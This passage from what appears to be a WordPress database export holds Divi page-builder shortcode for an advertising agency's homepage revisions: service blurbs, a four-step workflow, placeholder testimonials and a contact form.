et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_margin=\"|||\" custom_padding=\"0px||3px|||\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"100px\" box_shadow_color=\"#ffffff\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_left__hover=\"10%\" padding_top__hover=\"140px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Feature Titile\" _builder_version=\"3.25\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"||10px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2><span>Easy to start</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<div class=\"lp-element lp-pom-text nlh\" id=\"lp-pom-text-216\">\n<p><strong><em>Just four steps</em></strong></p>\n<p><strong><em></em></strong></p>\n</div>\n<div class=\"lp-element lp-pom-text nlh\" id=\"lp-pom-text-217\">\n<p>We had adopted proven workflow to produce consistent result, but never hesitate to cross the lines and work differently.</p>\n</div>[/et_pb_text][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"3.25\" width=\"100%\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"|0px|4px|||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"01. BRAND AUDIT\" use_icon=\"on\" font_icon=\"%%57%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_margin=\"||26px|||\" animation_style=\"fade\" animation_direction=\"bottom\"]<p style=\"text-align: center;\"><span>Analyzing the brand with all the key parameter (As per operating environment and competition)</span></p>[/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"02. STRATEGY\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" width=\"98.9%\" custom_margin=\"||26px||false|false\" custom_padding=\"||||false|false\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]<p><span>Starting with the summary of the plan, Defining TG, Writing/Creating USP</span></p>\n<p><span></span></p>[/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"3.25\" width=\"100%\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"|0px||||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"03. EXECUTION\" use_icon=\"on\" font_icon=\"%%57%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_margin=\"||26px|||\" animation_style=\"fade\" animation_direction=\"bottom\"]<div><span>Creative Development, Setting up the visual identity, implementing the IMC(Integrated Marketing Communication)</span></div>[/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"04. EVALUATION\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" width=\"98.9%\" custom_margin=\"||43px||false|false\" custom_padding=\"||||false|false\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]<div dir=\"ltr\"><span>The fourth but the most important step is evaluation, adaptation and reporting. To improvise future performance.</span></div>\n<p><span></span></p>[/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard-5.jpg\" alt=\"marketing strategy\" title_text=\"marketing strategy\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"6%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Testimonial Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"50px||50px|||\"][et_pb_row admin_label=\"Testimonial Title\" _builder_version=\"3.25\" custom_margin=\"|||\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat|on||on|\" text_text_color=\"#353740\" text_font_size=\"42px\" text_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\"]<p>From Our Clients</p>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"600px\" module_alignment=\"center\" custom_margin=\"|||\" hover_enabled=\"0\"]<p>Best Advertising Is Done By Satisfied Customers. We Believe &amp; Nurture It In Our Business.</p>\n[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Testimonial\" _builder_version=\"3.25\" custom_padding=\"|||\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Mitch Skolnik\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_2.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Andrel Nahaev\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_5.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Eduard Ungureanu\" job_title=\"Tech Support\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_1.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Tom Ewer\" job_title=\"Blogger\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_3.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_padding=\"50px||50px||false|false\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"10%\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Let\'s Start Something new<br /><span style=\"color: #FFF;\">Say Hello!</span></h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>We would love to connect up and join your brand journey. Do not hesitate to question/drop us a line, As discerning mind always take better decision.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form email=\"dhiraj@wthtest1.in8.cdn-alpha.com\" custom_message=\"Hi my name is %%Name%%, Email id is %%Email%% and Mobile No is %%Mobile_No%%, my message is %%Message%%\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"4.4.9\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Mobile_No\" field_title=\"Mobile No\" fullwidth_field=\"on\" _builder_version=\"4.4.9\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"4.4.9\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','134-revision-v1','','','2020-08-06 21:15:03','2020-08-06 21:15:03','',134,'https://wthtest1.in8.cdn-alpha.com/2020/08/06/134-revision-v1/',0,'revision','',0),(458,1,'2020-08-07 11:48:42','2020-08-07 11:48:42','[et_pb_section fb_built=\"1\" admin_label=\"Hero\" _builder_version=\"3.22\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\"][et_pb_row use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.5.2\" background_color=\"#fcd21d\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/Desktop-HD-1024x728-1.png\" width=\"100%\" width_tablet=\"100%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"100%\" max_width_tablet=\"100%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_margin=\"|auto|1px|auto||\" custom_padding=\"50px||50px|||\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\" make_fullwidth=\"on\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"10%|8%|10%|8%\" custom_padding__hover=\"|||\"][et_pb_text content_tablet=\"\" content_phone=\"<h1 style=%22text-align: center;%22><span style=%22color: #ffffff;%22>Welcome to</span><br /> <span style=%22color: #ffffff;%22> Advertising</span></h1>\n\" content_last_edited=\"on|phone\" _builder_version=\"4.4.9\" text_font=\"||||||||\" text_font_size=\"18px\" header_font=\"Montserrat|700||on|||||\" header_text_color=\"#f7f7f7\" header_font_size=\"76px\" header_line_height=\"1.3em\" custom_margin=\"6px||40px|||\" animation_style=\"zoom\" animation_duration=\"1200ms\" text_font_tablet=\"\" text_font_phone=\"\" text_font_last_edited=\"on|phone\" text_font_size_tablet=\"\" text_font_size_phone=\"12px\" text_font_size_last_edited=\"on|phone\" header_font_size_tablet=\"64px\" header_font_size_phone=\"40px\" header_font_size_last_edited=\"on|phone\" text_text_shadow_style=\"preset1\" locked=\"off\"]<h1 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Welcome to</span><br /> <span style=\"color: #ffffff;\"> Advertising</span></h1>[/et_pb_text][et_pb_button button_text=\"Learn More\" button_alignment=\"center\" _builder_version=\"4.4.9\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"4px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" animation_style=\"zoom\" animation_duration=\"1200ms\" box_shadow_style=\"preset2\" button_text_color_hover=\"#ffffff\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" locked=\"off\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#ffffff\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#ffffff\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" custom_padding_last_edited=\"on|tablet\" admin_label=\"Service Section\" _builder_version=\"4.4.9\" custom_margin=\"|||\" custom_padding=\"56px||110px|||\" custom_padding_tablet=\"20px||||false|false\" custom_padding_phone=\"12px||40px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>What we do</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Creative\" use_icon=\"on\" font_icon=\"%%74%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>It is important for the creative process and our lives. A key component of visual marketing to let businesses succeed.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Media\" use_icon=\"on\" font_icon=\"%%103%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Strategically using new age media and creating a media mix effectively to evolve a sales funnel or brand awareness to engagement.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Digital\" use_icon=\"on\" font_icon=\"%%107%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Digital has emerged as one of the efficient media, there is no spill over with the help of professional targeting &amp; even individual targeting is possible.</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Business Strategy\" use_icon=\"on\" font_icon=\"%%101%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Gaining the competitive edge with Integrated Marketing Communications (IMC) or building product marketing strategy / Go to market strategy, We are in.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Design\" use_icon=\"on\" font_icon=\"%%106%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p>Online presence of any brand/product/service starts with a well defined and clearly communicated website. Website is the key and elementry step for any advertising campaign. So be ready to a bolder start.</p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Design/Video/Photo\" use_icon=\"on\" font_icon=\"%%108%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Design is not Art, Art is about the Artist, &amp; Design is about the user. Blending &amp; Balancing Art, Design, Copy &amp; Business Objective is what we do.</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Video Section\" _builder_version=\"4.4.9\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"#d4b068\" background_color_gradient_start_position=\"65%\" background_color_gradient_end_position=\"65%\" custom_padding=\"|||\"][et_pb_row admin_label=\"Video\" _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"4%\" animation_starting_opacity=\"100%\" box_shadow_style=\"preset1\" box_shadow_blur=\"77px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_video src=\"https://www.youtube.com/watch?v=f47r43eO6BU&t=5s\" 